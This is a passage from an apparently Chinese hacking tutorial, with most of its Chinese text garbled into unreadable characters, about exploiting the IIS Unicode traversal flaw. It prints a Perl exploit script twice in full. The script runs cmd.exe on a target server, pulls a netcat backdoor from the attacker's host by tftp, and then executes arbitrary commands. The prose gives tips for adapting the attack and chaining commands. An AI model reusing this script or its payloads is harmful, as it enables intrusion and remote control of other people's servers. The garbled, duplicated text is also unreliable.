exit;
}
}
3¡¢¹¥»÷ÐÍNIT_UNICODEÈí¼þÌ××°
ÏÂÔصØÖ·http://packetstorm.securify.com/0011-exploits/NIT_UNICODE.zip
ѹËõ°üÀﺬÓÐÒÔÏÂÎĵµ£º
uni.pl -------ɨÃèUNICODE±àÂ멶´µÄÖ÷PERL³Ìʽ
uniexe.pl -----Ö´ÐÐTFTP¹ý³ÌµÄPERL³Ìʽ
ncx99.exe -----Ò»¸ö°Ñtelnet¶Ë¿ÚÅäÖÃÔÚ99µÄnetcatľÂí
tftpd32.exe -----TFTPÅäÖÃÈí¼þ
tftpd32.hlp -----°ïÖúÎĵµ
flie_id.diz
vendinfo.diz
readme.file -----ʹÓÃ˵Ã÷ºÍÀý×Ó
¡¡¡¡¸Ã³Ìʽ°üÖ÷ÒªÀûÓÃunicode±àÂ멶´£¬°Ñncx99.exeÉÏ´«µ½Ä¿±êÖ÷»ú£¬²¢Æô¶¯£¬Ê¹¹¥»÷ÕßÄܹ»Í¨¹ýtelnet Ä¿±êÖ÷»úµÄ99¶Ë¿Ú£¬µÇ½µ½Ä¿±êÖ÷»úÉϽøÐй¥»÷ÐÐΪ¡£
¡¡¡¡ÒÔϳÌʽÔÚʹÓÃʱÐèÒªÐÞ¸ÄһЩ¶«Î÷£¬ÕÒµ½$command="tftp -i .xxx.xxx.xxx GET ncx99.exe c:£Ü£Üinetpub£Ü£Üscripts£Ü£Ünit.exe"; Õâ¾ä£¬°Ñxxx.xxx.xxx.xxx.xxxÐÞ¸ÄΪÄúµÄIPµØÖ·£¬È»ºó´æÅÌ¡£Õâ¾äÖ÷ÒªÊÇ°ÑNCX99.EXE´ÓÄúµÄÖ÷»ú¸ÄÃû´«µ½Ä¿±êÖ÷»úc:£Üinetpub£Üscripts£ÜÈ¥¡£ÁíÍ⻹ÐèÒª¸ù¾ÝÄ¿±êÖ÷»úµÄNT°æ±¾£¬¶Ô³ÌʽÀïµÄ..À¯..×öÏàÓ¦µÄÐ޸ģ¬±ÈÈç˵Ŀ±êÖ÷»úÊÇWIN2K¾ÍÐÞ¸ÄΪ..Á ..
#!/usr/bin/perl
# This is for educational purpose's only!
# WHO LET THEM DOGS OUT!
# Use uni.pl first to see if this is a vulnerable server!
# Based of the script unicodeexecute.pl from Roelof Temmngh
# Files=uniexe.pl,uni.pl,readme.file,tftpd32.exe,exploit.readme
use Socket;
if ($#ARGV<0) {die "Usage: uniexe.pl IP:port command£Ün";}
($host,$port)=split(/:/,@ARGV[0]);
$target = inet_aton($host);
$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..À¯../winnt/system32/cmd.exe?/c $command HTTP/1.0£Ür£Ün£Ür£Ün£Ücls");
foreach $line (@results){
if ($line =~ /nit.exe/) {$failed=0;}
}
$failed2=1;
if ($failed==1) {
#You need to change the .xxx.xxx.xxx to your ip address. Duh!
$command="tftp -i .xxx.xxx.xxx GET ncx99.exe c:£Ü£Üinetpub£Ü£Üscripts£Ü£Ünit.exe";
$command=~s/ /£Ü /g;
@results2=sendraw("GET /scripts/..À¯../winnt/system32/cmd.exe?/c $command HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line2 (@results2){
if (($line2 =~ /nit.exe/ )) {$failed2=0;}
}
}
$command=@ARGV[1];
print "£Ün
Hit CTRL-C if this is Hanging";
$command=~s/ /£Ü /g;
my @results=sendraw("GET /scripts/..À¯../winnt/system32/cmd.exe?/c $command HTTP/1.0£Ür£Ün£Ür£Ün");
print @results;
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||2) ||
die("Socket problems£Ün");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...£Ün"); }
}
# NIT IN THE YEAR 2000
$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..À¯../winnt/system32/cmd.exe?/c $command HTTP/1.0£Ür£Ün£Ür£Ün£Ücls");
foreach $line (@results){
if ($line =~ /nit.exe/) {$failed=0;}
}
$failed2=1;
if ($failed==1) {
#You need to change the .xxx.xxx.xxx to your ip address. Duh!
$command="tftp -i .xxx.xxx.xxx GET ncx99.exe c:£Ü£Üinetpub£Ü£Üscripts£Ü£Ünit.exe";
$command=~s/ /£Ü /g;
@results2=sendraw("GET /scripts/..À¯../winnt/system32/cmd.exe?/c $command HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line2 (@results2){
if (($line2 =~ /nit.exe/ )) {$failed2=0;}
}
}
$command=@ARGV[1];
print "£Ün
Hit CTRL-C if this is Hanging";
$command=~s/ /£Ü /g;
my @results=sendraw("GET /scripts/..À¯../winnt/system32/cmd.exe?/c $command HTTP/1.0£Ür£Ün£Ür£Ün");
print @results;
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||2) ||
die("Socket problems£Ün");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...£Ün"); }
}
# NIT IN THE YEAR 2000
Æߣ®unicode±àÂ멶´Ìá¸ßƪ
²¢²»ÊÇ˵ÓÐUNICODE±àÂ멶´£¬ÒÔϵķ½·¨¾ÍÄÜÍêÈ«³É¹¦£¬Ö÷Òª¸øÄúÒ»ÖÖ˼¿¼µÄ
·½Ê½£¬×öµ½»îѧ»îÓÃ,¾ÙÒ»·´Èý,·±Ñܳö¸ü¶à¸üºÃµÄÀûÓ÷½·¨,Ìá¸ß¶ÔÄ¿±êÖ÷»ú¹¥
»÷³É¹¦»úÂÊ,ʹUNICODE±àÂ멶´µÄΣº¦ÐÔÈùÜÀíÔ±ÃǸü¼ÓÖØÊÓ¡£
¶Á¶®MCD°ïÖúÀïÃæµÄÄÚÈÝÓÈÆäÊÇÕâ·½ÃæµÄÄÚÈÝ£º
Çë×¢Ò⣬¼ÙÈç×Ö·û´®ÓÐÒýºÅ£¬Äܹ»½ÓÊÜÓÃÃüÁî·Ö¸ô·û '&&' ¸ô¿ª
µÄ¶à¸öÃüÁî¡£²¢ÇÒ£¬ÓÉÓÚ¼æÈÝÔÒò£¬/X ºÍ /E:ON Ïàͬ£¬/Y ºÍ
/E:OFF Ïàͬ£¬²¢ÇÒ /R ºÍ /C Ïàͬ¡£ºöÂÔÈκÎÆäËûÃüÁîÑ¡Ïî¡£
¼ÙÈçÖ¸¶¨ÁË /C »ò /K£¬ÃüÁîÑ¡ÏîºóµÄÃüÁîÐÐÆäÓಿ·Ö½«×÷ΪÃüÁîÐд¦
Àí£»ÔÚÕâÖÖÇé¿öÏ£¬»áʹÓÃÏÂÁÐÂß¼´¦ÀíÒýºÅ×Ö·û("):
1. ¼ÙÈç·ûºÏÏÂÁÐÈκÎÌõ¼þ£¬ÄÇôÔÚÃüÁîÐÐÉϵÄÒýºÅ×Ö·û½«±»
±£Áô:
- ²»´ø /S ÃüÁîÑ¡Ïî
- ÕûÕûÁ½¸öÒýºÅ×Ö·û
- ÔÚÁ½¸öÒýºÅ×Ö·ûÖ®¼äûÓÐÌرð×Ö·û£¬Ìرð×Ö·ûΪÏÂÁÐÖеÄ
Ò»¸ö: <>()@^|
- ÔÚÁ½¸öÒýºÅ×Ö·ûÖ®¼äÓÐÖÁÉÙÒ»¸ö¿Õ°××Ö·û
- ÔÚÁ½¸öÒýºÅ×Ö·ûÖ®¼äÓÐÖÁÉÙÒ»¸ö¿ÉÖ´ÐÐÎĵµµÄÃû³Æ¡£
2. ·ñÔò£¬ÀÏ°ì·¨ÊÇ£¬¿´µÚÒ»¸ö×Ö·ûÊÇ·ñÊǸöÒýºÅ×Ö·û£¬¼ÙÈç
ÊÇ£¬ÉáÈ¥¿ªÍ·µÄ×Ö·û²¢É¾³ýÃüÁîÐÐÉÏ µÄ×îºóÒ»¸öÒýºÅ×Ö·û£¬
±£Áô×îºóÒ»¸öÒýºÅ×Ö·ûÖ®ºóµÄÎÄ×Ö¡£
ÔÙÊìϤһÏÂÀûÓÃECHOдÈë·¨°ÑһЩÌرð×Ö·ûдµ½Îı¾ÎĵµµÄת»»¸ñʽ
ÎÄÕÂÕûÀí£ºÎ÷²¿ÊýÂë--רҵÌṩÓòÃû×¢²á¡¢ÐéÄâÖ÷»ú·þÎñ
http://www.west263.com
ÒÔÉÏÐÅÏ¢ÓëÎÄÕÂÕýÎÄÊDz»¿É·Ö¸îµÄÒ»²¿·Ö,Èç¹ûÄúҪתÔر¾ÎÄÕÂ,Çë±£ÁôÒÔÉÏÐÅÏ¢£¬Ð»Ð»!
